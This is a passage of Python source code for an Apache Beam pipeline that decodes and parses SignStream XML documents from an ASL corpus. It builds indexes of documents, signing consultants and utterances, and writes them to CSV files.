          Filename=sorted_corpus_index_pcoll_row[1],
          XML_B64=sorted_corpus_index_pcoll_row[2],
          LEN=sorted_corpus_index_pcoll_row[3]
        )
      )
    | beam.Map(lambda corpus_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(corpus_index_schemad_pcoll_row))
  )
  corpus_index_csv_path = beam__common.pl__X__write_pcoll_to_csv(
    sorted_corpus_index_csv_rows_pcoll, 
    "CORPUS-INDEX", 
    fidscs_globals.CORPUS_DS_FNAME, 
    fidscs_globals.SCHEMA_COL_NAMES__CORPUS_DS,
    d_pl_options
  )
  # global max over all LEN values; `or [None]` guards the empty-pcoll case
  max_xml_b64_len = (
    corpus_index_schemad_pcoll
    | "Beam PL: select LEN" >> beam.Map(lambda corpus_index_schemad_pcoll_row: corpus_index_schemad_pcoll_row.LEN)
    | beam.CombineGlobally(lambda corpus_index_b64_doc_length_rows: max(corpus_index_b64_doc_length_rows or [None]))
    # debug
    # | "Beam PL: print max (b64-encoded) length corpus doc" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="MAX (b64-encoded) DOC LENGTH"))
  )
  # corpus_index_csv_path_indexed = (
  #   corpus_index_csv_path
  #   | "Beam PL: apply RowIndex to corpus index csv path" >> beam.ParDo(RowIndexer(var_name_prefix="corpus_index_csv_path_id"))
  #   # debug
  #   # | "Beam PL: print indexed path to corpus index csv" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="INDEXED CORPUS INDEX CSV PATH"))
  # )
  corpus_index_csv_path_indexed = beam__common.pl__X__index_pcoll(corpus_index_csv_path, "corpus_index_csv_path")
  # side effect: assigns the max to the global (fidscs_globals.MAX_RAW_XML_B64_LEN)
  max_xml_b64_len_indexed = (
    max_xml_b64_len
    | "Beam PL: assign to global var (fidscs_globals.MAX_RAW_XML_B64_LEN)" >> beam.ParDo(global_var_value_assigner__raw_xml_b64_max_len)
    # | "Beam PL: apply RowIndex to maxlen" >> beam.ParDo(RowIndexer(var_name_prefix="max_xml_b64_len_id"))
    # debug
    # | "Beam PL: print indexed max (b64-encoded) length corpus doc" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="INDEXED MAX (b64-encoded) DOC LENGTH"))
  )
  max_xml_b64_len_indexed = beam__common.pl__X__index_pcoll(max_xml_b64_len_indexed, "max_xml_b64_len_indexed")
  combined_corpus_index_csv_path_and_max_xml_b64_len_indexed = (
    ({
      'corpus_index_csv_path': corpus_index_csv_path_indexed,
      'max_len': max_xml_b64_len_indexed
    })
    | "Beam PL: merge corpus_index_csv_path and max_len" >> beam.CoGroupByKey()
    # debug
    # | "Beam PL: print combined results" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="READ CORPUS INDEX CSV TO PCOLL"))
  )
  return combined_corpus_index_csv_path_and_max_xml_b64_len_indexed
def pl__2__decode_XML(corpus_index_schemad_pcoll, d_pl_options):
  """
  Decode the base-64-encoded XML carried by each corpus-index row.

  Each input row is a beam.Row with the SCHEMA_COL_NAMES__CORPUS_DS fields:
    DocumentID (int), Filename (str), XML_B64, LEN (int)
  and is mapped through the module-level decode_XML function.

  Note: d_pl_options is unused here but kept for signature consistency with
  the other pl__* stage functions.
  """
  decode_stage = "Beam PL: extract/decode base-64 encoded XML from corpus index document" >> beam.Map(decode_XML)
  return corpus_index_schemad_pcoll | decode_stage
def parse_signstream_database(corpus_index_decoded_XML_pcoll_row):
  """
  Parse one decoded SignStream XML document into a nested document record.

  Takes a one-element tuple whose first item is the decoded-XML dict and walks
  the SignStream database it contains: participants -> utterances -> (target
  videos, tokens).  See the literal string below for the exact shapes of the
  input dict and the returned record.
  """
  d_corpus_index_decoded_XML = corpus_index_decoded_XML_pcoll_row[0]
  """
    require:
      d_corpus_index_decoded_XML:
        {
          'DocumentID': d_corpus_index_schemad_pcoll_row['DocumentID'],
          'Filename': d_corpus_index_schemad_pcoll_row['Filename'],
          'XML': raw_xml,
          'LEN': len(raw_xml)
        }

    return:
      {
        'CORPUS_DOCUMENT_FILENAME': <corpus doc filename>, 
        'PARTICIPANT_SEQUENCE': [
          {
            'PARTICIPANT_NAME': <participant name>,
            'PARTICIPANT_AGE': <participant age>,
            'PARTICIPANT_GENDER': <participant gender>,
            'UTTERANCE_SEQUENCE': [
              {
                'UTTERANCE_ENGLISH_TRANSLATION': <utterance English translation>,
                'UTTERANCE_START_TIME': <utterance start time (time code)>,
                'UTTERANCE_END_TIME': <utterance end time (time code)>,
                'TARGET_VIDEO_SEQUENCE': [
                  {
                    'TARGET_VIDEO_FNAME': <target vid fname>,
                    'TARGET_VIDEO_CAMERA_PERSPECTIVE': <target vid camera perspective>
                  }
                ]
                'TOKEN_SEQUENCE': [
                  {
                    'TOKEN_LINGUSTIC_TEXT': <token linguistic text>,
                    'TOKEN_START_TIME': <token start time (time code)>,
                    'TOKEN_END_TIME': <token end time (time code)>,
                  }
                ]
              }
            ]
          }
        ]
      }
  """
  document_record = {'CORPUS_DOCUMENT_FILENAME': d_corpus_index_decoded_XML['Filename']}
  participant_sequence = []
  # ********** parse (XML) document with SignStream: BEGIN **********
  # debug
  # print(f"length of (ASCII) XML document {d_corpus_index_decoded_XML['Filename']}: {d_corpus_index_decoded_XML['LEN']}")
  # parse the in-memory XML; ss.SignStreamDatabase does the heavy lifting
  in_memory_xml_doc = io.StringIO(d_corpus_index_decoded_XML['XML'])
  ss_xml_db = ss.SignStreamDatabase.read_xml(in_memory_xml_doc)
  for participant in ss_xml_db.get_participants():
    participant_record = {}
    participant_record['PARTICIPANT_NAME'] = participant.get_name()
    participant_record['PARTICIPANT_AGE'] = participant.get_age()
    participant_record['PARTICIPANT_GENDER'] = participant.get_gender()
    utterance_sequence = []
    utterances = [utterance for utterance in participant.get_utterances()]
    for ui, utterance in enumerate(utterances):
      utterance_record = {}
      token_sequences = [token_sequence for token_sequence in utterance.get_tokens()]
      main_gloss_token_sequence = [token for token in utterance.get_tokens_for_field("main gloss")]
      utterance_main_gloss = ' '.join([token.get_text() for token in main_gloss_token_sequence])
      # NOTE(review): the last token sequence is presumably the English translation — confirm against the ss API
      utterance_translation = ' '.join([token.get_text() for token in token_sequences[-1]])
      utterance_time_codes = utterance.get_timecodes()
      utterance_record['UTTERANCE_ENGLISH_TRANSLATION'] = utterance_translation
      utterance_record['UTTERANCE_START_TIME'] = utterance_time_codes[0]
      utterance_record['UTTERANCE_END_TIME'] = utterance_time_codes[1]
      media_sequence = []
      for target_video in utterance.get_media():
        target_video_record = {}
        # keep only the path segment after the last ':' and url-quote it
        target_video_fname = str(urllib.parse.quote(target_video.get_filename().split(':')[-1]))
        target_video_record['TARGET_VIDEO_FNAME'] = target_video_fname
        media_camera_perspective = -1 # need to look this up!
        target_video_record['TARGET_VIDEO_CAMERA_PERSPECTIVE'] = media_camera_perspective
        media_url = "<need to look this up!>"
        target_video_record['MEDIA_URL'] = media_url
        media_sequence.append(target_video_record)
      utterance_record['TARGET_VIDEO_SEQUENCE'] = media_sequence
      token_sequence = []
      # NOTE: the key 'TOKEN_LINGUSTIC_TEXT' is (mis)spelled this way consistently
      # across the pipeline — do not "fix" it here in isolation.
      for ti, token in enumerate(main_gloss_token_sequence):
        token_record = {}
        token_linguistic_text = token.get_text().encode('utf-8') # must be encoded as binary since token can have punctuation and possibly other non-alphabetic characters
        token_record['TOKEN_LINGUSTIC_TEXT'] = token_linguistic_text
        token_time_codes = token.get_timecodes()
        token_record['TOKEN_START_TIME'] = token_time_codes[0]
        token_record['TOKEN_END_TIME'] = token_time_codes[1]
        token_sequence.append(token_record)
      utterance_record['TOKEN_SEQUENCE'] = token_sequence
      utterance_sequence.append(utterance_record)
    participant_record['UTTERANCE_SEQUENCE'] = utterance_sequence
    participant_sequence.append(participant_record)
  document_record['PARTICIPANT_SEQUENCE'] = participant_sequence
  # ********** parse (XML) document with SignStream: END **********
  return document_record
def pl__5__load_full_vid_index(corpus_index_decoded_XML_pcoll):
  """
  Emit (and print) the storage path of the previously-written video index csv.

  NOTE(review): beam.Create is normally applied to the Pipeline root, not to an
  existing pcoll as done here — confirm this stage is still used/valid.
  """
  return (
    corpus_index_decoded_XML_pcoll
    | "Beam PL: load vid index from csv into pcoll" >> beam.Create(
        [ # one row containing dict of:
            # 1. path to video index that was previously written to storage
          {
            'vid_index_path': fileio.path_join(fidscs_globals.DATA_ROOT_DIR, fidscs_globals.VIDEO_INDEXES_ARCHIVE.split('.')[0]+'.csv')
          }
        ]
      )
    # debug
    | "Beam PL: print saved vid index path" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="READ SAVED VID INDEX PATH"))
  )
def pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, d_pl_options):
  """
  Map each decoded corpus-index XML row through parse_signstream_database,
  producing one nested document record per corpus document.

  Note: d_pl_options is unused here but kept for signature consistency with
  the other pl__* stage functions.
  """
  parse_stage = "Beam PL: parse signstream corpus document" >> beam.Map(parse_signstream_database)
  return corpus_index_decoded_XML_pcoll | parse_stage
def debug_print_signstream_db(d_corpus_index_decoded_XML_row):
  """
  Debug helper: pretty-print the fields (and each field's allowed values) of
  the parsed SignStream database carried in this row, then pass the row
  through unchanged (as a one-element list, FlatMap-style).

  d_corpus_index_decoded_XML_row[0] is a dict of the form:
    {'DocumentID': ..., 'Filename': ..., 'ss_xml_db': <SignStreamDatabase>}
  """
  ss_xml_db = d_corpus_index_decoded_XML_row[0]['ss_xml_db']
  # debug
  print(f"\tfields:")
  for fi, field in enumerate(list(ss_xml_db.get_fields())):
    field_values = [fv.get_name() for fv in field.get_values()]
    print(f"\t\t#{fi}:")
    print(f"\t\t\tname: {field.get_name()}")
    print(f"\t\t\tlabel: {field.get_label()}")
    print(f"\t\t\tvalues:")
    for field_value in field_values:
      print(f"\t\t\t\t{field_value}")
  return [d_corpus_index_decoded_XML_row]  # passthrough
def validate_preprocess_participant_to_asl_consultant_id(tpl_participant_info_grouped_by_name):
  """
  Collapse grouped participant info down to a single (name, age, gender) tuple.

  tpl_participant_info_grouped_by_name:
    (<participant name>, [(<participant age (as string)>, participant_gender)])

  Ages are regex-parsed (they may arrive as e.g. '42 years'); when multiple
  distinct ages occur the greatest (most recent) wins, and -1 means no age was
  provided.  The first non-empty gender wins.  Returns a one-element list
  [(name, age, gender)], or passes the input through (with a FATAL message)
  when there is no associated info at all.
  """
  participant_name = tpl_participant_info_grouped_by_name[0]
  info_tpls = list(tpl_participant_info_grouped_by_name[1])
  if not info_tpls:
    print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} participant {participant_name} does not have any associated info")
    return [tpl_participant_info_grouped_by_name]  # passthrough
  multiple_ages = []
  multiple_genders = []
  for age_str, gender_str in info_tpls:
    # we must parse using regex since it is possible to receive age string as '42 years' for example
    parsed_ints = list(map(int, re.findall(r'\d+', age_str)))
    multiple_ages.append(parsed_ints[0] if parsed_ints else -1)  # -1 indicates no age provided
    multiple_genders.append(gender_str)
  multiple_ages = set(multiple_ages)
  if len(multiple_ages) > 0:
    age = max(multiple_ages)
    if len(multiple_ages) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
      print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} age is not unique: {multiple_ages}; assigning greatest value (most recent): {age}")
  else:
    if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
      print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} age info does not exist; assigning default age (-1)")
    age = -1
  gender = ""
  multiple_genders = set(multiple_genders)
  if len(multiple_genders) > 0 and (gender is None or len(gender) == 0):
    for _gender in multiple_genders:
      if len(_gender) > 0:
        gender = _gender
        if len(multiple_genders) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
          print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} participant {participant_name} gender is not unique: {multiple_genders}; current gender is {gender}; assigning first (non-empty) gender: {_gender}")
        break
  return [(participant_name, age, gender)]
def pl__4__create_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, d_pl_options):
  """
  Build the ASL-consultant index from parsed SignStream document records.

  Explodes each document's PARTICIPANT_SEQUENCE into (name, (age, gender))
  pairs, groups by name, validates/collapses each group to a single
  (name, age, gender) tuple, assigns an index (ASLConsultantID), and applies
  the SCHEMA_COL_NAMES__ASL_CONSULTANT_DS schema.

  Returns:
    asl_consultant_index_schemad_pcoll — rows of
    beam.Row(ASLConsultantID, Name, Age, Gender).
  """
  validated_mapping = (
    ss_parsed_xmldb_pcoll
    | "Beam PL: extract/transform participant records list" >> beam.Map(
        lambda d_ss_parsed_xmldb_entry: [
          (
            d_participant['PARTICIPANT_NAME'],
            (
              d_participant['PARTICIPANT_AGE'],
              d_participant['PARTICIPANT_GENDER']
            )
          ) for d_participant in d_ss_parsed_xmldb_entry['PARTICIPANT_SEQUENCE']
        ]
      )
    | "Beam PL: 'explode' participant list into pcoll of individual participant records, keyed by name" >> beam.FlatMap(lambda participant_tpl: participant_tpl)
    # debug
    # | "Beam PL: print participant record for document" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="participant record"))
    | "Beam PL: group participants keyed by named" >> beam.GroupByKey()
    # the above produces tuples of the form:
    #   (<participant name>, [(<participant age (as string)>, participant_gender)])
    | "Beam PL: validate/preprocess participant_to_asl_consultant_id mapping" >> beam.FlatMap(validate_preprocess_participant_to_asl_consultant_id) # outputs (<participant name>, <participant age (most recent)>, <participant gender>)
  )
  # assigns the ASLConsultantID: rows become (<id>, (<name>, <age>, <gender>))
  indexed_validated_mapping = beam__common.pl__X__index_pcoll(validated_mapping, "validated_mapping")
  return (
    indexed_validated_mapping
    | "Beam PL: apply schema to particpant_list pcoll" >> beam.Map(lambda tpl_asl_consultant_id_validated_participant_info: beam.Row(
          # SCHEMA_COL_NAMES__ASL_CONSULTANT_DS = [
          #   'ASLConsultantID',
          #   'Name',
          #   'Age',
          #   'Gender'
          # ]
          ASLConsultantID=int(tpl_asl_consultant_id_validated_participant_info[0]),
          Name=str(tpl_asl_consultant_id_validated_participant_info[1][0]),
          Age=int(tpl_asl_consultant_id_validated_participant_info[1][1]),
          Gender=str(tpl_asl_consultant_id_validated_participant_info[1][2])
        )
      )
    # debug
    # | "Beam PL: print asl_consultant_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="asl_consultant_index_schemad_pcoll entry"))
  ) # asl_consultant_index_schemad_pcoll
def pl__5__write_asl_consultant_index_csv(asl_consultant_index_schemad_pcoll, d_pl_options):
  """
  Sort the ASL-consultant index, re-apply its schema, serialize each row to a
  csv string, and write the "ASLCONSULTANT-INDEX" csv.

  Returns:
    asl_consultant_index_csv_path (pcoll) — from pl__X__write_pcoll_to_csv.
  """
  sorted_rows_pcoll = beam__common.pl__X__sort_pcoll(asl_consultant_index_schemad_pcoll, pcoll_label="asl_consultant_index")
  reschemad_pcoll = (
    sorted_rows_pcoll
    | "Beam PL: re-apply schema to sorted_asl_consultant_index" >> beam.Map(lambda sorted_asl_consultant_index_schemad_pcoll_row: beam.Row(
        ASLConsultantID=sorted_asl_consultant_index_schemad_pcoll_row.ASLConsultantID,
        Name=sorted_asl_consultant_index_schemad_pcoll_row.Name,
        Age=sorted_asl_consultant_index_schemad_pcoll_row.Age,
        Gender=sorted_asl_consultant_index_schemad_pcoll_row.Gender
      )
    )
  )
  csv_rows_pcoll = reschemad_pcoll | beam.Map(lambda asl_consultant_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(asl_consultant_index_schemad_pcoll_row))
  return beam__common.pl__X__write_pcoll_to_csv(
    csv_rows_pcoll,
    "ASLCONSULTANT-INDEX",
    fidscs_globals.ASL_CONSULTANT_DS_FNAME,
    fidscs_globals.SCHEMA_COL_NAMES__ASL_CONSULTANT_DS,
    d_pl_options
  )  # asl_consultant_index_csv_path
def pl__5__create_document_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, corpus_index_schemad_pcoll, asl_consultant_index_schemad_pcoll, d_pl_options):
  """
  Join documents to ASL consultants.

  From the parsed SignStream records this extracts (document filename,
  participant name) pairs; from the corpus index it extracts (filename ->
  DocumentID); from the consultant index it extracts (name -> ASLConsultantID).
  Two CoGroupByKey joins (first on filename, then on participant name) produce
  one row per (document, consultant) pair.

  Returns:
    document_asl_consultant_index_schemad_pcoll — rows of
    beam.Row(DocumentID, Filename, ASLConsultantID, ParticipantName).
  """
  # (<document filename>, <participant name>) pairs, one per participant per document
  document_participant_pcoll = (
    ss_parsed_xmldb_pcoll
    | "Beam PL: extract/transform document-participant records list" >> beam.Map(
        lambda d_ss_parsed_xmldb_entry: [
          (
            d_ss_parsed_xmldb_entry['CORPUS_DOCUMENT_FILENAME'],
            d_participant['PARTICIPANT_NAME']
          ) for d_participant in d_ss_parsed_xmldb_entry['PARTICIPANT_SEQUENCE']
        ]
      )
    | "Beam PL: 'explode' document-participant list into pcoll of individual document-participant records, keyed by name" >> beam.FlatMap(lambda document_participant_tpl: document_participant_tpl)
    # debug
    # | "Beam PL: print document-participant record" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-participant record"))
    | "Beam PL: group document-participants keyed by document filename" >> beam.GroupByKey()
    # the above produces tuples of the form:
    #   (<document filename>, [<participant name>])
    | "Beam PL: 'explode' document-participant-list into pcoll where each row has a list of (<document filename>, <participant name>)" >> beam.Map(
        lambda document_participant_list_tpl: [
          (
            document_participant_list_tpl[0],
            participant_name
          ) for participant_name in document_participant_list_tpl[1]
        ]
      ) # outputs [(<document filename>, <participant name>)]
    | "Beam PL: 'explode' row as list of (<document filename>, <participant name>) into a pcoll where each row is an individual (<document filename>, <participant name>)" >> beam.FlatMap(lambda list_document_participant: list_document_participant)
    # now we have a pcoll with rows as (<document filename>, <participant name>)
    # debug
    # | "Beam PL: print document-participant records" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-participant entry"))
  )
  # (<document filename>, <document id>) pairs from the corpus index
  document_id_pcoll = (
    corpus_index_schemad_pcoll
    | "Beam PL: extract (<document filename>, <document id>) from corpus_index_schemad_pcoll" >> beam.Map(
        lambda corpus_index_schemad_pcoll_row: (
          corpus_index_schemad_pcoll_row.Filename,
          corpus_index_schemad_pcoll_row.DocumentID
        )
      )
    # | "Beam PL: print document-id-to-filename records" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document-id-to-filename entry"))
  )
  # join on filename, then re-key by participant name
  participant_name_doc_id = (
    ({
      'document_id_pcoll': document_id_pcoll,
      'document_participant_pcoll': document_participant_pcoll
    })
    | "Beam PL: merge document_id_pcoll and document_participant_pcoll" >> beam.CoGroupByKey()
    # the above produces tuples of the form:
    #   ('ncslgr10e.xml', {'document_id_pcoll': ['7'], 'document_participant_pcoll': ['Norma Bowers Tourangeau', 'Benjamin Bahan']})
    | "Beam PL: extract (<participant name>, <doc id>, <doc filename>) from merged document_id_pcoll and document_participant_pcoll" >> beam.Map(
        lambda tpl: [
          (
            participant_name,
            (
              tpl[1]['document_id_pcoll'][0],
              tpl[0]
            )
          ) for participant_name in tpl[1]['document_participant_pcoll']
        ]
      )
    | "Beam PL: 'explode' doc-id-to-participant-name lists" >> beam.FlatMap(lambda list_doc_id_to_participant_name_tpl: list_doc_id_to_participant_name_tpl)
    # debug
    # | "Beam PL: print merged document_id_pcoll and document_participant_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="merged document_id_pcoll and document_participant_pcoll entry"))
  )
  # (<participant name>, <asl consultant id>) pairs from the consultant index
  participant_name_asl_constultant_id = (
    asl_consultant_index_schemad_pcoll # Row(ASLConsultantID=0, Age=-1, Gender='female', Name='Lana Cook')
    | "Beam PL: extract (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll" >> beam.Map(
        lambda asl_consultant_index_schemad_pcoll_row: (
          asl_consultant_index_schemad_pcoll_row.Name,
          asl_consultant_index_schemad_pcoll_row.ASLConsultantID
        )
      )
    # debug
    # | "Beam PL: print extracted (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="extracted (<participant name>, <asl consultant id>) from asl_consultant_index_schemad_pcoll"))
  )
  # join on participant name and apply the final schema
  document_asl_consultant_index_schemad_pcoll = (
    ({
      'participant_name_doc_id': participant_name_doc_id,
      'participant_name_asl_constultant_id': participant_name_asl_constultant_id
    })
    | "Beam PL: merge participant_name_doc_id and participant_name_asl_constultant_id" >> beam.CoGroupByKey()
    # the above produces tuples of the form:
    #   ('Norma Bowers Tourangeau', {'participant_name_doc_id': [('24', 'ncslgr10l.xml'), ('33', 'ncslgr10i.xml'), ('7', 'ncslgr10e.xml'), ('29', 'ncslgr10k.xml'), ('13', 'ncslgr10f.xml'), ('21', 'ncslgr10m.xml'), ('30', 'ncslgr10j.xml'), ('18', 'ncslgr10c.xml'), ('5', 'ncslgr10d.xml'), ('25', 'ncslgr10n.xml')], 'participant_name_asl_constultant_id': [3]})
    | "Beam PL: 'explode' participant-asl-consultant-id-doc-list into pcoll where each row has a list of (<doc id>, <asl consultant_id>)" >> beam.Map(
        lambda participant_doc_id_list_tpl: [
          (
            int(corpus_doc_id_tpl[0]),                                            # DocumentID
            corpus_doc_id_tpl[1],                                                 # (corpus document) Filename
            participant_doc_id_list_tpl[1]['participant_name_asl_constultant_id'][0],  # ASLConsultantID
            participant_doc_id_list_tpl[0]                                        # <participant name>
          ) for corpus_doc_id_tpl in participant_doc_id_list_tpl[1]['participant_name_doc_id']
        ]
      ) # outputs [(<corpus doc id>, <corpus doc filename>, <asl consultant_id>, <participant name>)]
    | "Beam PL: 'explode' (<corpus doc id>, <corpus doc filename>, <asl consultant_id>, <participant name>) lists" >> beam.FlatMap(lambda list_doc_id_to_asl_consultant_id_tpl: list_doc_id_to_asl_consultant_id_tpl)
    | "Beam PL: apply schema to extracted document_asl_consultant_index_schemad_pcoll tuples" >> beam.Map(lambda document_asl_consultant_mapping_tpl: beam.Row(
        DocumentID=int(document_asl_consultant_mapping_tpl[0]),
        Filename=document_asl_consultant_mapping_tpl[1],
        ASLConsultantID=int(document_asl_consultant_mapping_tpl[2]),
        ParticipantName=document_asl_consultant_mapping_tpl[3]
      )
    )
    # debug
    # | "Beam PL: print document_asl_consultant_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("document_asl_consultant_mapping entry"))
  )
  return document_asl_consultant_index_schemad_pcoll
def pl__6__write_document_asl_consultant_index_csv(document_asl_consultant_index_schemad_pcoll, d_pl_options):
  """
  De-duplicate, sort, and write the document/ASL-consultant index csv.

  Rows are flattened to (DocumentID, ASLConsultantID, Filename, ParticipantName)
  tuples, de-duplicated with beam.Distinct, sorted, re-schema'd, serialized,
  and written as the "DOCUMENT-ASLCONSULTANT-INDEX" csv.

  Returns:
    document_asl_consultant_index_csv_path (pcoll) — from pl__X__write_pcoll_to_csv.
  """
  distinct_document_asl_consultant_index_schemad_pcoll = (
    document_asl_consultant_index_schemad_pcoll
    | "Beam PL: extract SCHEMA_COL_NAMES__DOCUMENT_ASL_CONSULTANT_DS columns from document_asl_consultant_index_schemad_pcoll" >> beam.Map(
        lambda document_asl_consultant_index_schemad_pcoll_row: (
          document_asl_consultant_index_schemad_pcoll_row.DocumentID,
          document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID,
          document_asl_consultant_index_schemad_pcoll_row.Filename,
          document_asl_consultant_index_schemad_pcoll_row.ParticipantName
        )
      )
    | "Beam PL: select distinct document_asl_consultant_index rows" >> beam.Distinct()
  )
  sorted_distinct_document_asl_consultant_index_schemad_pcoll= beam__common.pl__X__sort_pcoll(distinct_document_asl_consultant_index_schemad_pcoll, pcoll_label="distinct_document_asl_consultant_index")
  sorted_distinct_document_asl_consultant_index_csv_rows_pcoll = (
    sorted_distinct_document_asl_consultant_index_schemad_pcoll
    | "Beam PL: apply minimal schema to create final document_asl_consultant_index_schemad_pcoll of distinct rows" >> beam.Map(
        lambda sorted_distinct_document_asl_consultant_index_row: beam.Row(
          DocumentID=int(sorted_distinct_document_asl_consultant_index_row[0]),
          ASLConsultantID=int(sorted_distinct_document_asl_consultant_index_row[1]),
          Filename=str(sorted_distinct_document_asl_consultant_index_row[2]),
          ParticipantName=str(sorted_distinct_document_asl_consultant_index_row[3])
        )
      )
    | beam.Map(lambda distinct_document_asl_consultant_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(distinct_document_asl_consultant_index_schemad_pcoll_row))
  )
  return beam__common.pl__X__write_pcoll_to_csv(
    sorted_distinct_document_asl_consultant_index_csv_rows_pcoll, 
    "DOCUMENT-ASLCONSULTANT-INDEX", 
    fidscs_globals.DOCUMENT_ASL_CONSULTANT_DS_FNAME, 
    fidscs_globals.SCHEMA_COL_NAMES__DOCUMENT_ASL_CONSULTANT_DS,
    d_pl_options
  ) # document_asl_consultant_index_csv_path
def pl__6__create_document_asl_consultant_utterance_index_schemad_pcoll(ss_parsed_xmldb_pcoll, document_asl_consultant_index_schemad_pcoll, d_pl_options):
  """
  Build the utterance index: one row per (document, consultant, utterance).

  From the parsed SignStream records this explodes every participant's
  UTTERANCE_SEQUENCE into rows keyed by (document filename, participant name);
  from the document/consultant index it extracts (DocumentID, ASLConsultantID)
  under the same key; a CoGroupByKey join then attaches the ids to every
  utterance and the final schema is applied.

  Returns:
    document_asl_consultant_utterance_index_schemad_pcoll — rows of
    beam.Row(Filename, DocumentID, ParticipantName, ASLConsultantID,
             UtteranceSequence, StartTime, EndTime, Tokens, Translation).
  """
  # ((<doc filename>, <participant name>), (<utterance seq id>, <token text>, <translation>, <start>, <end>))
  corpus_document_participant_utterance_mapping = (
    ss_parsed_xmldb_pcoll
    | "Beam PL: 'explode' ss_parsed_xmldb_pcoll_row_dict 'UTTERANCE_SEQUENCE'" >> beam.Map(
        lambda ss_parsed_xmldb_pcoll_row_dict: [
          (
            (
              ss_parsed_xmldb_pcoll_row_dict['CORPUS_DOCUMENT_FILENAME'],  # <corpus document filename>
              participant_utterance_sequence[0],                           # <participant name>
            ),
            participant_utterance_sequence[1],                             # <participant utterance sequence>
          ) for participant_utterance_sequence in [
              (participant['PARTICIPANT_NAME'], participant['UTTERANCE_SEQUENCE']) for participant in ss_parsed_xmldb_pcoll_row_dict['PARTICIPANT_SEQUENCE']
            ]
        ]
      )
    | "Beam PL: 'explode' ((<participant name>, <corpus document filename>), <participant utterance sequence>) lists" >> beam.FlatMap(lambda list_participant_utterance_sequence_doc_tpl: list_participant_utterance_sequence_doc_tpl)
    # note: token text is stored utf-8-encoded (see parse_signstream_database), hence the .decode('ascii') here
    | "Beam PL: 'explode' <participant utterance sequence> from ((<participant name>, <corpus document filename>), <participant utterance sequence>)" >> beam.Map(
        lambda participant_doc_utterance_sequence_tpl: [
          (
            (
              utterance_seq_id, 
              ' '.join([d_token['TOKEN_LINGUSTIC_TEXT'].decode('ascii') for d_token in participant_utterance['TOKEN_SEQUENCE']]),  # <participant utterance linguistic token sequence text>
              participant_utterance['UTTERANCE_ENGLISH_TRANSLATION'],       # <participant utterance English translation>
              participant_utterance['UTTERANCE_START_TIME'],                # <participant utterance start time>
              participant_utterance['UTTERANCE_END_TIME'],                  # <participant utterance end time>
            ),
            (
              participant_doc_utterance_sequence_tpl[0][0],                 # <participant name>
              participant_doc_utterance_sequence_tpl[0][1],                 # <corpus document filename>
            )
          ) for utterance_seq_id, participant_utterance in enumerate(participant_doc_utterance_sequence_tpl[1])
        ]
      )
    | "Beam PL: 'explode' participant_utterance_name_doc_tpl lists" >> beam.FlatMap(
        lambda list_participant_utterance_name_doc_tpl: list_participant_utterance_name_doc_tpl
      )
    | "Beam PL: transform participant_utterance_name_doc_tpl to be keyed by (<corpus document filename>, <participant name>)" >> beam.Map(
        lambda participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl: (
          participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[1],        # (<corpus document filename>, <participant name>)
          (
            participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][0],   # <utterance seq id>
            participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][1],   # <utterance linguistic token sequence text>
            participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][2],   # <utterance English translation>
            participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][3],   # <utterance start time>
            participant_utterance_name_doc_keyed_by_utterance_seq_id_tpl[0][4]    # <utterance end time>
          )
        )
      )
    # debug
    # | "Beam PL: print corpus_document_participant_utterance_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("corpus_document_participant_utterance_mapping entry"))
  )
  # ((<doc filename>, <participant name>), (<doc id>, <asl consultant id>)) from the document/consultant index
  corpus_document_participant_doc_id_asl_consultant_id_mapping = (
    document_asl_consultant_index_schemad_pcoll
    | "Beam PL: extract ((<corpus document filename>, <participant name>), (<corpus document id>, <asl consultant id>)) from document_asl_consultant_index_schemad_pcoll" >> beam.Map(
        lambda document_asl_consultant_index_schemad_pcoll_row: (
          (document_asl_consultant_index_schemad_pcoll_row.Filename, document_asl_consultant_index_schemad_pcoll_row.ParticipantName),
          (document_asl_consultant_index_schemad_pcoll_row.DocumentID, document_asl_consultant_index_schemad_pcoll_row.ASLConsultantID)
        )
      )
    # debug
    # | "Beam PL: print corpus_document_participant_doc_id_asl_consultant_id_mapping" >> beam.ParDo(beam__common.PipelinePcollPrinter("corpus_document_participant_doc_id_asl_consultant_id_mapping entry"))
  )
  # join the two mappings on (<doc filename>, <participant name>) and apply the final schema
  document_asl_consultant_utterance_index_schemad_pcoll = (
    ({
